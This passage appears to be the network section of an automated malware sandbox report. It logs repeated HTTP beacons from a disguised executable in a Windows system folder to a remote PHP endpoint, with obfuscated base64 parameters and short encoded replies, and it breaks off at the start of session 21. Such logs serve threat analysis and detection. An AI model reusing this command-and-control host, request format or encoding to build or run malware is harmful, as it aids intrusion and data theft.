                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              14192.168.2.449751188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:13:01.632052898 CEST2107OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:13:02.354907036 CEST731INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:02 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=unEQqYafrgSS%2FITY9Ny%2BluuMHUDZ0Ysa7HhaQavLcOp7apk%2BkaPPNkdlc%2BpYk%2BM5pFz2zZ1SEGaZk7hzfhRn8ak5W0S6I8of8JW9RUWX43xP5teSbtPTAH9kKi7yYhmi8xM%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8f17ba0141c1-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              15192.168.2.449752188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:13:07.373977900 CEST2107OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:13:08.109608889 CEST729INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:08 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pw4ZpM6vOqqj04YCFvzOlQNvSlXdayxSvtLze1ZPoMrcFQx9wPInu4Z%2B1CscZG5%2BnizWhCBYRjZzyo3tt7EAMN%2BbwCIpl1Au%2B6skD3xfYwGlNrQ36wxyqo1SOXSx9orK6CQ%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8f3ba9cb18bc-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              16192.168.2.449753188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:13:13.124547958 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:13:13.870984077 CEST731INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:13 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qcRNsFC3uxaun1RGRRcwSpDxO%2FP28YBgVaskSw%2BoDv2SK%2Fzj61ToT23U96jtyYVQLctwRUnS7l%2F5s2eMn0yMjbr971ciokNeWJfm%2BXBzFCxxkAhczenCOnYu8zK0HMycZy4%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8f5faa030c9c-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              17192.168.2.449754188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:13:18.897149086 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:13:19.623548031 CEST723INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:19 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VBxt6fc5fyAaqEwWn8LqKdFQtctyD6NqGyVELFDIqVbC8FAHgV4CeiJCNYSWmI62fZxgNEgQgVnGpb19p4%2Bnxb6xLvOJYVHupZUoPoKoJA1Ggp7Lpsc8dP6lCxJoJAInxBk%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8f839c055e6a-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              18192.168.2.449755188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:13:24.665007114 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:13:25.407684088 CEST727INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:25 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1kC1PQcwPMxpj82uFiRGUOLJJjFHty%2FKhOLSyRGunNCAFVkUA66GMXPqb77MBemjzkcqIEAG1q6A80rIfAaPcT2WE4eLuP3vMvidVco5hUc29LzmSbPOqbZYu%2FW50DPVr%2Fg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8fa7bfe01809-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              19192.168.2.449756188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:13:30.421821117 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:13:31.156621933 CEST727INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:31 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0B3YV5UPMeJnSn%2BJK32jLVDOJJMFNn0c6TUZJOGDptHWUwmuy8%2FzTqfQq4RuF8DpLnALOI51o62hEGnaIDA0ycqIrtMZ59oWjYKwzP39aR3e8TffZ%2FJo2xI998w7piPS5Ls%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8fcbb9b041e3-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              20192.168.2.449757188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:13:36.171247959 CEST2080OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=d1nIiojIkNmMkNjZzM2MjZGO3MTO4EWNkVWYyQDZ4EzMzUjZjJmIsISO3IWYycjY2ADOmBjMiJDOhBzYzMWOjJWMklDM0IjZ4UDM1UDZ3IDNiojIxEjY0QGZzYmYxI2M4QDM1MzN3EWM0EGZkNTN0kjMlFmIsISNwgTZ1ADMihjZjFTNxQGMxkDZyMDOhlzMiJzY5QWOiFGNycjYhFmMiojI1kDZkNTYwYTNiVmM5QGOyMTY5QGMwYmMmZmM1cDOjNmI7xSfiADWOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVGVFRKNETptWaiNTOtJmc1clVvFUa [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:13:36.906351089 CEST731INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:36 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QbhMFihBkBVAjtAAggo6RwDe4TEtiT8sRaKQljNjStdsz9u65niahkOLS6Ttu6ia57cp7Uye7Cm%2BV%2BA2p0VgidnMCnjioSqKkA0Pv3f4DXxf4%2B%2BD%2BwdlB9oCNZfZC4izw0A%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb8fef9bb34291-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              21192.168.2.449758188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
